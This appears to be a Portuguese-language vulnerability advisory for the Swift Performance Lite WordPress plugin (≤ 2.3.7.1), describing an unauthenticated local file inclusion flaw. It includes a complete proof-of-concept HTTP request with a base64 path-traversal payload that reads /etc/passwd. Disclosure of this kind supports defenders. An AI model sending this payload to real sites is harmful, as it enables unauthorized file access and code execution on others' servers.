
Swift Performance Lite <= 2.3.7.1 - Inclusão de Arquivo PHP Local Não Autenticada via 'ajaxify'
Swift Performance Lite <= 2.3.7.1 - Inclusão de Arquivo PHP Local não Autenticada via 'ajaxify'
O plugin Swift Performance Lite para WordPress é vulnerável a Inclusão de Arquivo PHP Local em todas as versões até, e incluindo, 2.3.7.1 através da função 'ajaxify'. Isso possibilita que atacantes não autenticados incluam e executem arquivos arbitrários no servidor, permitindo a execução de qualquer código PHP nesses arquivos. Isso pode ser usado para contornar controles de acesso, obter dados sensíveis ou obter execução de código em casos onde imagens e outros tipos de arquivos "seguros" podem ser carregados e incluídos.
Payload Base64 = ["template-part","null","../../../../../etc/passwd"]
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 202
action=swift_performance_ajaxify&data=WyJ0ZW1wbGF0ZS1wYXJ0IiwibnVsbCIsIi4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QiXQ==